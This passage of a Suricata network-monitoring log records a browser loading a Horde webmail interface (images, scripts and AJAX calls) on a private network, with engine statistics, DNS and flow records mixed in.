{"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:27:05.025649+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.071870+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":13}} {"timestamp":"2020-02-29T00:27:05.074175+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":4}} {"timestamp":"2020-02-29T00:27:05.075180+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:27:05.075225+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.075684+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":5}} {"timestamp":"2020-02-29T00:27:05.080128+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:27:05.080803+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:27:05.081294+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":6}} {"timestamp":"2020-02-29T00:27:05.082259+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":14}} {"timestamp":"2020-02-29T00:27:05.082704+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:27:05.081787+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:27:05.082241+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":7}} {"timestamp":"2020-02-29T00:27:05.084761+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:27:05.085232+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":8}} {"timestamp":"2020-02-29T00:27:05.086063+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:27:05.086632+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":9}} {"timestamp":"2020-02-29T00:27:05.087326+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:27:05.117258+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:27:05.129323+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:05.129537+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:27:09.000200+0000","event_type":"stats","stats":{"uptime":15281,"capture":{"kernel_packets":142477,"kernel_drops":0},"decoder":{"pkts":142501,"bytes":97889223,"invalid":196,"ipv4":140902,"ipv6":10,"ethernet":142501,"raw":0,"null":0,"sll":0,"tcp":135303,"udp":5388,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2925,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2941,"synack":2932,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1928,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2465,"failed_udp":116},"tx":{"http":5062,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2549}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":191168,"memcap":0}}} {"timestamp":"2020-02-29T00:27:09.589567+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53172,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:27:09.593077+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53174,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":0}} {"timestamp":"2020-02-29T00:27:10.080478+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":8}} {"timestamp":"2020-02-29T00:27:10.090833+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":16}} {"timestamp":"2020-02-29T00:27:10.090862+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53170,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":10}} {"timestamp":"2020-02-29T00:27:11.000463+0000","flow_id":2027510962510488,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"192.99.2.8","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:10.449176+0000","end":"2020-02-29T00:22:10.558947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:11.000760+0000","flow_id":643767004159899,"event_type":"flow","src_ip":"192.168.10.130","src_port":34304,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":61,"bytes_toserver":3771,"bytes_toclient":80639,"start":"2020-02-29T00:26:01.384923+0000","end":"2020-02-29T00:26:06.438507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:11.724590+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:27:11.749561+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36399,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:11.774787+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":0}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:11.858046+0000","flow_id":2030680668073977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58972,"proto":"UDP","dns":{"type":"answer","id":36399,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:27:11.989276+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53178,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:16.000175+0000","event_type":"stats","stats":{"uptime":15288,"capture":{"kernel_packets":142521,"kernel_drops":0},"decoder":{"pkts":142534,"bytes":97894139,"invalid":196,"ipv4":140933,"ipv6":10,"ethernet":142534,"raw":0,"null":0,"sll":0,"tcp":135332,"udp":5390,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2926,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2942,"synack":2933,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1929,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2466,"failed_udp":116},"tx":{"http":5064,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2550}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10890,"memcap_state":0,"memcap_global":0},"http":{"memuse":40157,"memcap":0}}} {"timestamp":"2020-02-29T00:27:16.947002+0000","flow_id":915539654280893,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53178,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.456753+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:27:19.458133+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 